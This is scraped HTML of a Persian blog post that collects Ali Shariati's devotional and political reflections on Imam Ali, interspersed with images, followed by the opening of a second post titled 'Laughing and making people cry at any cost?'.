small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221916%D8%B9%D9%84%DB%8C%20%D8%A7%DB%8C%20%D9%87%D9%85%D8%A7%DB%8C2.jpg" height="937" width="517"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... سخن گفتن درباره علی (ع) بی‌نهایت دشوار است، زیرا به عقیده من، علی (ع) یک قهرمان یا یک شخصیت تاریخی تنها نیست. هر کس درباره علی (ع) از ابعاد و جهات مختلف بررسی کند، خود را نه تنها در برابر یک فرد، یک فرد برجسته انسانی در تاریخ می‌بیند، بلکه خود را در برابر معجزه‌ای و حتا در برابر یک مساله علمی، یک معمای علمی «‌این خلقت» احساس می‌کند. بنابراین درباره علی (ع) سخن گفتن برخلاف آنچه که در وهله اول به ذهن می‌آید، درباره یک شخصیت بزرگ سخن گفتن نیست، بلکه درباره معجزه‌ای است که به نام انسان و به صورت انسان در تاریخ متجلی شده است.</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221424%D8%AD%D8%AC%D8%AA%20%D8%A7%D9%84%D9%84%D9%87%20%D8%B9%D9%84%DB%8C.jpg" height="293" width="511"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font size="4" face="Mihan-IransansBold" color="#000099"><span style="background-color: rgb(204, 255, 255);"><span style="font-size: small;">علی (ع) یکی از شخصیت‌های بزرگی است که به نظر من بزرگترین شخصیت انسانی است (پیغمبر (ص) را باید جدا کرد که رسالت خاصی دارد) که از همه وقت، امروز ناشناخته می‌بود، بدشناخته‌تر است که کیست، محققین او را برای اولین بار می‌شناختند.</span></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-22319%D8%AD%D8%A8%20%D8%B9%D9%84%DB%8C2.jpg" height="414" width="555"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">گاه علی (ع) را که توی این جنگ‌ها یک قهرمان شمشیرزن است، توی شهر یک سیاستمدار پرتلاش حساس است و توی زندگی یک پدر و یک همسر بسیار مهربان و بسیار دقیق است و یک انسان زندگی است و در همه ابعادش می‌بینیم، تاریخ می‌گوید، تنها در نیمه‌ شب‌ها، توی نخلستانهای اطراف مدینه می‌رفته و نگاه می‌کرده که کسی نبیند و نشوند و بعد سر در حلقوم چاه فرو می‌برده و می‌نالیده! هرگز، من نمی‌توانم قبول کنم که رنج‌های مدینه و رنج‌های عرب و جامعه عرب و حق جامعه اسلامی و حتا یارانش، این روحی را که از همه این آفرینش بزرگ‌تر است وادار به چنین نالیدنی بکند، هرگز!</span><span style="font-size: small;"><br></span></font></span></font><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-223212%D8%B9%D9%84%DB%8C%20%D8%A7%DB%8C%20%D9%87%D9%85%D8%A7%DB%8C.jpg" height="790" width="509"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">درد علی (ع) خیلی بزرگ‌تر است و آن درد خیلی باید درد نیرومندی باشد، که این روح را این اندازه بی‌تاب بکند! مسلما این همان درد انسانی است که خود را در این عالم زندانی می‌بیند، انسانی است که خود را بیشتر از این عالم می‌بیند و احساس خفقان در این عالم می‌کند.</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221530%D9%88%D9%84%DB%8C%20%D8%A7%D9%84%D9%84%D9%87.jpg" height="352" width="507"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">مسلما هر کسی که انسان‌تر است، پیش از آنچه هست در خود نیاز احساس می‌کند، انسان است، این است که می‌بینیم علی (ع) قهرمان متعالی سخن گفتن و زیبا سخن گفتن و پاک سخن گفتن است، نمونه اعلا و متعالی شهامت و گستاخی در جنگ است، نمونه عالی پاکی روح در حد اساطیر و تخیل فرضی انسان در طول تاریخ است، نمونه اعلای محبت و رقت و لطافت روح است، نمونه عالی دوست داشتن در حد نمونه‌های اساطیری است، نمونه عالی عدل خشک دقیقی است که حتا برای مرد خوبی مانند عقیل ـ برادرش - قابل تحمل نیست، نمونه اعلای تحمل است در جایی که تحمل نکردن، خیانت است و نمونه اعلای همه زیبایی‌هایی است و همه فضایلی است که انسان همواره نیازمندش بوده و ندانسته.</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-223312%D9%85%D9%86%20%D9%81%D8%A7%D8%B1%D9%82%20%D8%B9%D9%84%DB%8C.jpg" height="377" width="505"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">علی (ع) نه تنها امام است، در طول تاریخ هیچ شخصیتی با این امتیاز را نداشته که یک خانواده امام (ع) است، یعنی خانواده اساطیری است، خانواده‌ای که پدر علی (ع) است، مادر زهرا (س) است، پسر آن خانواده حسین (ع) [و حسن (ع)] است و دختر آن خانواده زینب (س) است.</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">چهره هایی که می‌خواهم، در قرن بیستم، به عنوان سمبل و تجسم یک ایدئولوژی مطرح و عنوا کنم، دارای این خصوصیات است. البته این کامل‌ترین خصوصیاتش نیست، اما اساسی‌ترین آنهاست</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">علی (ع) نخستین نسل در انقلاب اسلامی، علی (ع) در خانه پسرعمو، رابطه متقابل پیغمبر (ص) و علی (ع)، علی (ع) مظهر جهاد و رهبری جنگ، علی (ع)، ‌مرد سیاست و مسؤولیت اجتماعی، علی (ع) مرد کار یدی، کشاورزی و تولید، علی (ع) ‌مظهر نثر و شعر علی (ع) بهترین سخنور و سخنگو، علی (ع) ‌فیلسوف، علی (ع) مظهر بینش‌ها و ابعاد متضاد، علی (ع) ‌زهد انقلابی و عبادت، ‌تکیه بر عدالت، علی (ع) تساوی در مصرف، علی (ع) امام و مظهر حقیقت‌ها و ارزش‌ها، علی (ع) نفی مصلحت به خاطر حقیقت، نفی شخصیت، علی (ع) انسان‌دوستی.</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-223414%D8%B9%D9%84%DB%8C.jpg" height="722" width="507"><br></span></span></span></span></p> <span style="font-size: small;"></span><span style="font-size: small;"></span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">ما ملتی که افتخار بزرگ انتصاب به علی (ع) و مکتب علی (ع) را داریم و این بزرگترین افتخار تاریخی است که می‌تواند بدان بنازد و بالاخره بزرگترین سرمایه، امیدی است که می‌تواند به وسیله آن نجات پیدا کرده، ‌به آگاهی، بیداری، حرکت و رهایی برسد، اما در عین حال می‌بینیم که با داشتن علی (ع) و با داشتن «عشق به علی» هم نرسیده‌ایم!</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">در صورتی که «شیعه علی (ع) بودن» از «چون علی (ع) عمل کردن» شروع می‌شود و این مرحله‌ای است پس از شناخت و پس از عشق.</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">بنابراین ما یک ملت «دوستدار علی (ع) » ‌هستیم، اما نه «شیعه علی (ع) »‌! چراکه شیعه علی (ع) همچنان که گفتم علی (ع) ‌وار بودن، علی (ع) ‌وار اندیشیدن، علی (ع) ‌وار احساس کردن در برابر جامعه، ‌علی (ع) وار مسؤولیت احساس کردن و انجام دادن و در برابر خدا و خلق، ‌علی (ع) ‌وار زیستن، علی (ع) ‌وار پرستیدن و علی (ع) ‌وار خدمت کردن است..."</span></font></span></font></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-22218%D9%87%D8%A7%20%D8%B9%D9%84%DB%8C%20%D8%A8%D8%B4%D8%B1.jpg" height="329" width="538"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><span style="font-size: small;"><strong>علی، حقیقتی بر گونه اساطیر</strong><br>"... علی ، رب النوع انواع گوناگون عظمت ها، قداست ها ، زیبایی ها و احساس های مطلق است. ازآن گونه مطلق هایی که بشر همواره دغدغه دیدن و پرستیدنش را داشته ، وهرگز نبوده ، ومعتقد شده که ممکن نیست درکالبد یک انسان تحقق پیدا کند ، و ناچار ، می ساخته است.</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><span style="font-size: small;">علی در همان حد مطلقی که پرومته در اساطیر ، روح تشنه و محتاج انسان را از فداکاری اشباع می کرده ، و دموستنس از قدرت و صداقت و لطف سخن، و هرکول از قدرت و نیرومندی جسم ، و خدایان دیگر از نهایت رقت و محبت و لطافت روح ، همه را در یک رب النوع جمع می کند . علی ، نیازهای را که در طول تاریخ، انسان ها را به خلق نمونه های خیالی ، و به ساختن الهه ها و رب النوع های فرضی می کشانده ، در تاریخ امروز اشباع می کند.</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><span style="font-size: small;">و از همه شگفت همه فضایل مطلقی را که ما ناچار در اسطوره ها و رب النوع ، حتی فرضی ، قابل جمع نیست ، در یک اندام عینی جمع کرده است. جنگ هایش را ملاحضه می کنیم و او را مانند یک رب النوع اساطیری می یابیم که با خون ریزی و بی باکی و نیرومندی شدید در حد مطلق پیکار می کند. به طوری که نیاز انسان را به داشتن و بودن یک احساس قدرت مطلق بشری، سیراب میکند.</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><span style="font-size: small;">و در کوفه ،در برابر یک یتیم ، چنان ضعیف و چنان لرزان و چنان پریشان می شود که رفیق ترین احساس یک مادر را به صورت اساطیری نشان می دهد. و در مبارزه با دشمن چنان بی باکی و خشونت به خرج می دهد. که مظهر خشونت شمشیر است . و شمشیرش ( ذوالفقار) مظهر برندگی و خون ریزی و بی رحمی نسبت به دشمن در مبارزه است. و در داخل ، از این نرمتر، و از صمیمی تر ، و از این پرگذشت تر پیدا نمیشود.</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><span style="font-size: small;">در جای دیگر، علی وقتی می بیند اگر بخواهد به خاطر احقاق حقش شمشیر بکشد. مرکز خلافت و قدرت اسلامی متلاشی می شود. و وحدت مسلمین بر باد می رود ، ناگزیر صبر می کند ، یک ربع قرن صبر می کند و با شرایطی و در وضعی زندگی می کند که دست احساس پرومته ی به زنجیر کشیده را در انسان به وجود می آورد . اما علی، به خاطر انسان ، این زنجیر را خود بر اندامش می پیچد. یک ربع قرن خاموشی از طرف روحی که همواره بی قرار است و از ده سالگی وارد نهضت اسلام شده ، به تعبیر خودش صبری با طعم احساس انسانی است که "خار در چشم و استخوان در گلو" است..."</span></font></span></font></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-222158%D9%88%D9%84%D8%A7%DB%8C%D9%87%20%D8%B9%D9%84%DB%8C%20%D8%AD%D8%B5%D9%86%DB%8C.jpg" height="497" width="497"><br></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><strong><span style="font-size: small;">چهره علی علیه السلام</span></strong></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"><span style="font-size: small;">"... چهره‌ی "علی" در روشنایی، زیبا و خدایی است. به تو و من، بی‌مذهب و مذهبی، هر دو،علی را در تاریکی نشان داده‌اند..."</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-222355%D8%A8%D8%B1%D8%A7%D8%A6%D8%AA.jpg" height="301" width="497"><br></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;"><strong>درد علی علیه السلام</strong></span><span style="font-size: small;"><br></span><span style="font-size: small;"><br></span><span style="font-size: small;">"... درد علی دو گونه است :<br>یک درد. دردی است که از زخم شمشیر ابن ملجم در فرق سرش احساس می‌کند. و درد دیگر دردی است که او را تنها در نیمه‌شب‌های خاموش به دل نخلستان‌های اطراف مدینه کشانده... و به ناله در آورده است.<br>ما تنها بر دردی می‌گرییم که از شمشیر ابن ملجم در فرق‌اش احساس می‌کند.<br>اما، این درد علی نیست.<br>دردی که چنان روح بزرگی را به ناله در آورده است،تنهائی است. که ما آن‌را نمی‌شناسیم!!<br>باید این درد را بشناسیم... نه آن درد را...<br>که علی درد شمشیر را احساس نمی‌کند.<br>و...ما...<br>درد علی را احساس نمی‌کنیم..."</span></font></span></font></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-22253%D8%B9%D9%84%DB%8C%20%D8%A7%D9%85%DB%8C%D8%B1.jpg" height="261" width="483"><br></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;"><strong>سکوت</strong><br>"... مگر با کلمات می توان از علی سخن گفت؟<br>باید به سکوت گوش فرا داد تا از او چه ها می گوید؟<br>او با علی آشناتر است..."</span></font></span></font></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-22268%D8%B9%D9%84%DB%8C%20%D9%85%D8%B9%20%D8%A7%D9%84%D8%AD%D9%821.jpg" height="380" width="484"><br></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><strong><span style="font-size: small;">علی من ...</span></strong></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... این علی که شما وصفش می‌کنید همان رستم خودمان است که آرایش اسلامی‌اش کرده‌اید! این علی شما به درد صوفی‌ها و پهلوان‌ها می‌خورد و سمبل زورخانه و خانقاه شده است!</span></font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <span style="font-size: small;"> </span> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">این علی‌ای نیست که من به او معتقدم، علی من آن علی است که در درون جامعه اسلامی، با منافق ستمکار، خواجه برده فروش و پارچه‌ورمال و استثمارگر، هر چند مسلمان هم باشد، به خاطر اسلام مبارزه می‌کند. و او مردی است که چهار هزار نفر مقدس دعاخوان نالان در پیشگاه خداوند را، که جای سجده در پیشانی‌شان نمایان است و در میان‌شان حافظ قرآن بسیار، یک جا با شمشیر نابود می‌کند. چه کسی جرئت این کار را داشت و دارد؟!..."</span></font></span></font></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><span style="font-size: small;">&nbsp;<img src="http://images.khabaronline.ir//images/2013/10/13-10-22-22273%D8%B5%D8%B1%D8%A7%D8%B7.jpg" height="365" width="461"><br></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">".<strong>.. و تو ای علی! ای شیر! مرد خدا و مردم، ربّ النوع عشق و شمشیر! ما شایستگی "شناخت تو" را ازدست داده‌ایم. شناخت تو را از مغز‌های ما برده‌اند، اما "عشق تو " را، علی‌رغم روزگار، در عمق وجدان خویش، در پس پرده‌های دل خویش، هم‌چنان مشتعل نگاه داشته‌ایم،</strong> چگونه تو عاشقان خویش را در خواری رها می‌کنی؟ تو ستمی را بر یک زن یهودی، که در ذِمّه حکومت‌ات می‌زیست، تاب نیاوردی، و اکنون، مسلمانان را در ذمه‌ی یهود ببین. و ببین که بر آنان چه می‌گذرد! ای صاحب آن بازو، که یک ضربه‌اش از عبادت هر دو جهان برتر است، ضربه‌ای دیگر!..."</span></font></span></font></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><span style="font-size: small;">&nbsp;<img src="http://images.khabaronline.ir//images/2013/10/13-10-22-222752%D8%AD%D8%A8.jpg" height="578" width="437"><br></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... امام علی را باید از دولاشاپلی پرسید که دوازده سال است شب و روز درباره او میاندیشد و نهج‌البلاغه‌اش را بزبان خود تدوین کرده و افکار و حالات و زندگی و رنجها و دردها و گرفتاریهایش را در این کوفه پلید پردشمن پست می‌داند و می‌داند که این «خونریز خشمگین صحنه پیکار» چه شد که «سوخته خاموش خلوت محراب» شد ؟ این شیر خدا در این نخلستان خاموش چرا تنها مینالد ؟ چرا سر در حلقوم چاه برده است ؟ دردش چیست ؟ نه از آن عربی که تولیت حرم او را دارد و هر روز ضریحش را گردگیری می‌کند و آب و جارو و گلاب و فرش و پرده و نذر و نذور و شمع و مُهر و تسبیح و..."</span></font></span></font><span style="font-size: small;"><br></span><strong><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-222842%D8%AD%D8%A8%D9%87%20%D8%AC%D9%86%D8%A9.jpg" height="141" width="432"><br></span></span></span></span></strong></p> <p><strong><span style="font-size: small;"> </span></strong></p> <strong><span style="font-size: small;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">"... آن انسان شگفتی که سینه‌اش انبوه فشرده‌ای از آگاهی‌ها است و اندیشه‌اش به راه‌های آسمان آشناتر است از راه‌های زمین او است که ناگهان از بستر نرمِ خانه، نیمه‌های شب می‌گریزد و سینه‌اش خفقان می‌گیرد و به نخلستان‌های حومه‌ی شهر پناه می‌برد و در دل شب، از درد و حیرت و هراس در برابر ملکوت، عظمت وجود و جمال و جاذبه‌ی خدا و حقارت و نیاز خویش، ناله برمی‌دارد و از هوش می‌رود..."<br></font></span></font><br><br></span></strong> <strong> <b> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="font-size: small; text-decoration: overline blink; background-color: #F2F2F2"> <font size="6" face="Arial"><a href="http://talar.shandel.info/thread-205.html"> «تالار گفتمان شریعتی»</a></font></span></b></font></b></strong><br><strong><span style="font-size: small;"><br><br><font size="5" face="Mihan-Koodak"></font><br></span><span style="font-size: small;"></span></strong> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/علی علیه السلام">علی علیه السلام</a>، <a href="/post/tag/دکترعلی شریعتی">دکترعلی شریعتی</a>،</font><br><br></font> </div> text/html 2017-06-15T10:47:28+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی خنداندن و گریاندن به هر قیمتی؟ http://1001SHAYADOBAYAD.mihanblog.com/post/3516 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <span style="text-decoration: overline blink; letter-spacing: 3pt; vertical-align: bottom; background-color: #F2F2F2"> <font size="6" face="Arial"><u><font color="#CE0000">&nbsp;</font></u><a href="http://www.khabaronline.ir/(X(1)S(xw2yyasemnpthubdrwtpxcqi))/detail/675677/weblog/ghfadaie"><font color="#CE0000">خنداندن و گریاندن به هر قیمتی؟</font></a><u><font color="#CE0000"> </font> </u></font></span></p> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <font size="5"> <br> </font> <img src="http://s9.picofile.com/file/8297837234/XAND8NDAN_BE_HAR_QEYMATY_2.jpg" alt="http://s9.picofile.com/file/8297837234/XAND8NDAN_BE_HAR_QEYMATY_2.jpg" height="366" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8297837426/XAND8NDAN_BE_HAR_QEYMATY_3.jpg" alt="http://s9.picofile.com/file/8297837426/XAND8NDAN_BE_HAR_QEYMATY_3.jpg" height="385" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8297837642/XAND8NDAN_BE_HAR_QEYMATY_4.jpg" alt="http://s9.picofile.com/file/8297837642/XAND8NDAN_BE_HAR_QEYMATY_4.jpg" class="shrinkToFit" height="687" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8297837892/XAND8NDAN_BE_HAR_QEYMATY_1.jpg" alt="http://s8.picofile.com/file/8297837892/XAND8NDAN_BE_HAR_QEYMATY_1.jpg" height="382" border="0" width="550"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> 